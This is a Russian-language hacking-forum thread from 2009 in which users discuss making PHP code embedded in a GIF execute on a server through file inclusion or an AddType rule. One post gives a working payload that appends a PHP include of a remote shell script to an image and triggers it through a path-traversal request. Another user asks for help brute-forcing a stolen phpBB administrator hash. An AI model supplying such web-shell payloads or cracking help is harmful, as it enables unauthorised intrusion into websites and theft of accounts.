Ваши вопросы по уязвимостям.

09.07.2009, 16:43

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

С нами: 9610769

Репутация: 380

Цитата:

Сообщение от diznt

Сам тестил? У меня не пашет (.gif)

Не пашет понятие растяжимое, если выпадает в error то значит в картинки какие то символы интерпретируется за начало php кода а если не пашет - не выполняеться код то значит не правильно что то делаешь с php кодом.

З.Ы. ша дочитал что ты хочешь - что бы картинка выполнялась как php код ее нужно либо проинклюдить в этот самый php код либо добавить расширения картинки в addtype - что бы она исполнялась как php код - сама по себе она не исполниться и конечно в браузере ты не увидешь алерта - браузер будет интерпретировать то что передает сервер по соответствующему заголовку HTTP.

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось PaCo; 09.07.2009 в 16:50.. Причина: надо спать побольше

09.07.2009, 16:59

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

С нами: 9619229

Репутация: 445

Цитата:

Сообщение от PaCo

Собственно видел в видео что как то в картинку подставляли алерт... заходили по картинке (заливали ее в ручную на локалхост) и вылетал алерт

не выполняеться код то значит не правильно что то делаешь с php кодом.

да? делал как Ch3ck и все равно. И в инете все облазил и испробывал. Не хочет

09.07.2009, 17:05

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

С нами: 9610769

Репутация: 380

Цитата:

Сообщение от diznt

Тебе уже 2 человека говорят - ЧТО НУЖНО ПРОИНКЛЮДИТЬ КАРТИНКУ В PHP КОД(который в итоге в баузере будет выводиться как текст с Content-type:text/html) или с недостаточной фильтрацией в Exif запихнуть туда код и тогда тебе и алерт будет и phpinfo(при условии что это инклюд без всяких фильтров) и в видео именно так и происходит.

Последний раз редактировалось PaCo; 09.07.2009 в 17:09..

09.07.2009, 18:04

~~nub-hacker~~

Banned

Регистрация: 23.06.2009

Сообщений: 89

С нами: 8886744

Репутация: -67

Извините за глупый вопрос. Сколько символов минимальная длинна пароля в phpBB 2.0.17. Просто есть хэш админа и надо поставить на брут на ночь. Вот чтобы не брутить лишние надо узнать мин.длинну.

10.07.2009, 10:29

~~nub-hacker~~

Banned

Регистрация: 23.06.2009

Сообщений: 89

С нами: 8886744

Репутация: -67

Цитата:

Сообщение от nub-hacker

// Без ответа

09.07.2009, 18:16

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

С нами: 10485026

Репутация: 1879

Странно... В конце картинки пишешь <?php include('http://site.com/shell.php'); ?> и запускаешь картинку http://site.com/index.php?path=../../../../../image.gif всё. Откроется шелл, если конечно allow_url_include=on.

Последний раз редактировалось Ch3ck; 09.07.2009 в 18:19..

09.07.2009, 18:24

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

С нами: 9619229

Репутация: 445

Цитата:

Сообщение от Ch3ck

а) понял про что ты...
Не... Я имею ввиду чисто шелл через картинку залить при этом нету lfi/rfi !

09.07.2009, 18:34

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

С нами: 10485026

Репутация: 1879

Если нет лфи/рфи то как написал Пако, надо добавлять add type чтобы гифка исполнялась как пхп

09.07.2009, 19:30

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

С нами: 9619229

Репутация: 445

Цитата:

Сообщение от Ch3ck

Если нет лфи/рфи то как написал Пако, надо добавлять add type чтобы гифка исполнялась как пхп

.htaccess ? Если через него то у меня же нету доступа к серву

#10

09.07.2009, 20:03

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

С нами: 9593606

Репутация: 4915

diznt
Вот это твоя аватарка?
https://forum.antichat.ru/avatars/avatar49286.gif
Ты её сам залил?

Ты как думаешь, если-бы можно было .gif файлы просто так исполнять, то долго бы этот форум прожил?

Надо иногда наверное и самому подумать, тем более:

Цитата:

Сообщение от diznt

php сам знаю чуток

Создать сделку

Мои сделки

Сделка